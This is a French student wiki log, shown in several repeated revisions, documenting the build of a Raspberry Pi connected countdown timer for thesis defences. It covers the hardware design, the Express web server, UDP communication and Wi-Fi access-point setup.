Nous avons également pu trouver des bibliothèques python pour utiliser le pilote de leds, et commencer le programme. Nous utiliserons deux pilotes de leds en cascade que nous contrôlerons avec 3 GPIO de la Raspberry. Nous avons également prévu de rajouter un ATMega328p qui pourra lui aussi contrôler les pilotes si on modifie la position de trois jumper. L'ATMega sera relié à la Raspberry en série pour qu'il puissent être programmé à travers elle.<br />
<br />
Pour alimenter le device, nous avons ajouté à notre liste de matériel un transformateur 230VAC vers 12VDC pour alimenter les leds ainsi qu'un régulateur 12VDC vers 5VDC pour alimenter la Raspberry (2A). Ensuite la Raspberry se chargera d'alimenter les pilote de leds et l'ATMega328p.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
Durant cette séance nous avons finalisé le routage de la carte électronique suivant le circuit précédemment définit, et nous avons installé les librairies nécessaire à la programmation des pilotes de leds.<br />
<br />
Nous avons également testé les 7-segments qui nous ont été fournit, et nous nous sommes rendus compte qu'ils étaient à cathode commune et donc fonctionnaient différemment de ce qui était indiqué sur la datasheet. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des registre à décalage pour contrôler toutes les sorties.<br />
<br />
Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
Les afficheurs 7-segments de devant ayant à afficher la même chose que ceux de derrière, nous les connecterons entre eux afin réduire de moitié la quantité de composants à utiliser.<br />
<br />
===programme Raspberry===<br />
<br />
Durant cette séance, nous avons également pensé au soft qui sera embarqué dans la Raspberry. Nous avions décidé de configurer la Raspberry en accesspoint WiFi et de faire tourner un serveur web qui sera accessible lorsque l'utilisateur se connectera au WiFi de la Raspberry. En parallèle, un autre programme tournera sur la Raspberry et s'occupera du calcul du Timer et du contrôle des leds. Pour que le programme puisse communiquer avec le serveur nous avons plusieurs solutions à étudier : IPC, socket, écriture/lecture dans des fichiers.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Carte électronique===<br />
<br />
Lors de cette séance, nous avons pu terminer la carte. Le schematic final est le suivant : <br />
<br />
<br />
[[Fichier:SchematicP4IOT.png|center|1000px]]<br />
<br />
<br />
Le PCB est le suivant : <br />
<br />
[[Fichier:RoutageP4IOT.png|center|1000px]]<br />
<br />
<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.<br />
<br />
===Programme Raspberry===<br />
<br />
Pendant cette séance nous avons également finaliser le programme de la Raspberry et installer les librairies qui permettent d'utiliser le registre à décalage et les GPIO <code>WiringPi</code>.<br />
<br />
Dans ce programme, après les initialisations, une socket UDP est crée pour recevoir la valeur initiale du Timer depuis le serveur web. La socket est par la suite fermée et le message reçu converti en Entier. Puis deux threads sont lancés : Le premier qui permet le calcul du Timer en se basant sur la valeur initial et en utilisant l'horloge physique de la Raspberry (fonction : <code>clock_gettime(CLOCK_REALTIME, &<timespec>);</code>), le deuxième thread contrôle les 7-segements après l'avoir parser en unités et dizaines. Les deux threads communiquent entre eux avec un pipe et un système de verrou pour synchroniser l'envoie et la réception. Finalement les threads et le pipe sont fermés proprement.<br />
<br />
Ce programme affiche les valeurs supérieurs à 99 secondes en minutes et celle inférieurs à 99 secondes en seconde. Le programme et disponible sur le git : https://github.com/ael-mess/raspberry-pi-timer/blob/master/pi.c<br />
<br />
==Séance 6==<br />
<br />
Durant cette séance nous avons combiner les deux programmes, et automatiser leurs lancement. Nous avons crée un script shell qui lance le serveur web, puis dans une boucle infini lance le Timer puis supprime les fichiers .json du controllers du serveur web à la fin de chaque timer. Ce script à était mis dans <code>/etc/.rclocal</code> de la Raspberry en tache de fond, pour qu'il puissent être lancer à chaque allumage de la Raspberry même avant le loging.<br />
<br />
===Test===<br />
<br />
Pendant cette dernière séance nous avons également souder une partie de nos composants pour faire des tests. Le test de la partie électronique à révéler un comportement anormal du circuit : des segments de leds restent allumer sans que aucune tension sur la base des transistors ne soit appliquée. Nous nous sommes assuré de corriger toutes les erreurs de soudure/contact mais nous n'avions pas pu trouver la source du problème. L’hypothèse qui ont était émise est que la carte n'aillant pas était nettoyé avant la soudure, le contact n'était pas pareil pour tous les composants, et du coup le potentiel entre deux points reliées n'était pas identique (M.Thierry Flamen).<br />
<br />
La partie logiciel elle, marche très bien sans aucun comportement anormal.<br />
<br />
===Amélioration si plus temps===<br />
<br />
- prendre plus de temps pour réaliser et tester la partie hardware.<br />
<br />
- utiliser la socket pour l'envoie de chaque valeur du timer et non que pour la valeur initial. (parce que le timer calculer par le serveur web utilise la date de la Raspberry et n'est pas précis)<br />
<br />
==Flyer==<br />
[[Fichier:Flyer timer iot.jpeg|800px|center]]</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49609P4 IOT 20182019-01-26T18:17:59Z<p>Mcreteur : /* Carte électronique */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
Pendant cette séance, nous avons également établit une liste du matériel que nous utiliserons : une Raspberry pi pour faire tourner le serveur accessible en wifi, un transformateur 230VAC vers 5VDC pour alimenter la Raspberry, des afficheurs 7-segments, et un driver de leds pour utiliser le moins de sortie possible.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous anons essayé de trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
Nous avons également pu trouver des bibliothèques python pour utiliser le pilote de leds, et commencer le programme. Nous utiliserons deux pilotes de leds en cascade que nous contrôlerons avec 3 GPIO de la Raspberry. Nous avons également prévu de rajouter un ATMega328p qui pourra lui aussi contrôler les pilotes si on modifie la position de trois jumper. L'ATMega sera relié à la Raspberry en série pour qu'il puissent être programmé à travers elle.<br />
<br />
Pour alimenter le device, nous avons ajouté à notre liste de matériel un transformateur 230VAC vers 12VDC pour alimenter les leds ainsi qu'un régulateur 12VDC vers 5VDC pour alimenter la Raspberry (2A). Ensuite la Raspberry se chargera d'alimenter les pilote de leds et l'ATMega328p.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
Durant cette séance nous avons finalisé le routage de la carte électronique suivant le circuit précédemment définit, et nous avons installé les librairies nécessaire à la programmation des pilotes de leds.<br />
<br />
Nous avons également testé les 7-segments qui nous ont été fournit, et nous nous sommes rendus compte qu'ils étaient à cathode commune et donc fonctionnaient différemment de ce qui était indiqué sur la datasheet. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des registre à décalage pour contrôler toutes les sorties.<br />
<br />
Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
Les afficheurs 7-segments de devant ayant à afficher la même chose que ceux de derrière, nous les connecterons entre eux afin réduire de moitié la quantité de composants à utiliser.<br />
<br />
===programme Raspberry===<br />
<br />
Durant cette séance, nous avons également penser au soft qui sera embarqué dans la Raspberry. Nous avions décidé de configurer la Raspberry en accesspoint WiFi et de faire tourner un serveur web qui sera accessible lorsque l'utilisateur se connecte au WiFi de la Raspberry. En parallèle, un autre programme tournera sur la Raspberry et s'occupera du calcul du Timer et du contrôle des leds. pour que le programme puisse communiquer avec le serveur nous avons plusieurs solutions que nous allons étudier : ipc, socket, écriture/lecture dans des fichiers.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû se renseigner sur son fonctionnement et se documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Carte électronique===<br />
<br />
Lors de cette séance, nous avons pu terminer la carte. Le schematic final est le suivant : <br />
<br />
<br />
[[Fichier:SchematicP4IOT.png|center|1000px]]<br />
<br />
<br />
Le PCB est le suivant : <br />
<br />
[[Fichier:RoutageP4IOT.png|center|1000px]]<br />
<br />
<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.<br />
<br />
===Programme Raspberry===<br />
<br />
Pendant cette séance nous avons également finaliser le programme de la Raspberry et installer les librairies qui permettent d'utiliser le registre à décalage et les GPIO <code>WiringPi</code>.<br />
<br />
Dans ce programme, après les initialisations, une socket UDP est crée pour recevoir la valeur initiale du Timer depuis le serveur web. La socket est par la suite fermée et le message reçu converti en Entier. Puis deux threads sont lancés : Le premier qui permet le calcul du Timer en se basant sur la valeur initial et en utilisant l'horloge physique de la Raspberry (fonction : <code>clock_gettime(CLOCK_REALTIME, &<timespec>);</code>), le deuxième thread contrôle les 7-segements après l'avoir parser en unités et dizaines. Les deux threads communiquent entre eux avec un pipe et un système de verrou pour synchroniser l'envoie et la réception. Finalement les threads et le pipe sont fermés proprement.<br />
<br />
Ce programme affiche les valeurs supérieurs à 99 secondes en minutes et celle inférieurs à 99 secondes en seconde. Le programme et disponible sur le git : https://github.com/ael-mess/raspberry-pi-timer/blob/master/pi.c<br />
<br />
==Séance 6==<br />
<br />
Durant cette séance nous avons combiner les deux programmes, et automatiser leurs lancement. Nous avons crée un script shell qui lance le serveur web, puis dans une boucle infini lance le Timer puis supprime les fichiers .json du controllers du serveur web à la fin de chaque timer. Ce script à était mis dans <code>/etc/.rclocal</code> de la Raspberry en tache de fond, pour qu'il puissent être lancer à chaque allumage de la Raspberry même avant le loging.<br />
<br />
===Test===<br />
<br />
Pendant cette dernière séance nous avons également souder une partie de nos composants pour faire des tests. Le test de la partie électronique à révéler un comportement anormal du circuit : des segments de leds restent allumer sans que aucune tension sur la base des transistors ne soit appliquée. Nous nous sommes assuré de corriger toutes les erreurs de soudure/contact mais nous n'avions pas pu trouver la source du problème. L’hypothèse qui ont était émise est que la carte n'aillant pas était nettoyé avant la soudure, le contact n'était pas pareil pour tous les composants, et du coup le potentiel entre deux points reliées n'était pas identique (M.Thierry Flamen).<br />
<br />
La partie logiciel elle, marche très bien sans aucun comportement anormal.<br />
<br />
===Amélioration si plus temps===<br />
<br />
- prendre plus de temps pour réaliser et tester la partie hardware.<br />
<br />
- utiliser la socket pour l'envoie de chaque valeur du timer et non que pour la valeur initial. (parce que le timer calculer par le serveur web utilise la date de la Raspberry et n'est pas précis)<br />
<br />
==Flyer==<br />
[[Fichier:Flyer timer iot.jpeg|800px|center]]</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49608P4 IOT 20182019-01-26T18:16:24Z<p>Mcreteur : /* Structuration du projet */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
Pendant cette séance, nous avons également établit une liste du matériel que nous utiliserons : une Raspberry pi pour faire tourner le serveur accessible en wifi, un transformateur 230VAC vers 5VDC pour alimenter la Raspberry, des afficheurs 7-segments, et un driver de leds pour utiliser le moins de sortie possible.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous anons essayé de trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
Nous avons également pu trouver des bibliothèques python pour utiliser le pilote de leds, et commencer le programme. Nous utiliserons deux pilotes de leds en cascade que nous contrôlerons avec 3 GPIO de la Raspberry. Nous avons également prévu de rajouter un ATMega328p qui pourra lui aussi contrôler les pilotes si on modifie la position de trois jumper. L'ATMega sera relié à la Raspberry en série pour qu'il puissent être programmé à travers elle.<br />
<br />
Pour alimenter le device, nous avons ajouté à notre liste de matériel un transformateur 230VAC vers 12VDC pour alimenter les leds ainsi qu'un régulateur 12VDC vers 5VDC pour alimenter la Raspberry (2A). Ensuite la Raspberry se chargera d'alimenter les pilote de leds et l'ATMega328p.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
Durant cette séance nous avons finalisé le routage de la carte électronique suivant le circuit précédemment définit, et nous avons installer les librairies nécessaire à la programmation des pilotes de leds.<br />
<br />
Nous avons également tester les 7-segments qui nous ont étaient fournit, et nous nous sommes rendu compte qu'ils étaient à cathode commune et donc fonctionnaient différemment à ce qui a était indiqué sur la datasheet. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des registre à décalage pour contrôler toutes les sorties.<br />
<br />
Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
Les afficheurs 7-segments de devant ayant à afficher la même chose que ceux de derrière, nous les connecterons entre eux afin réduire de moitié la quantité de composants à utiliser.<br />
<br />
===programme Raspberry===<br />
<br />
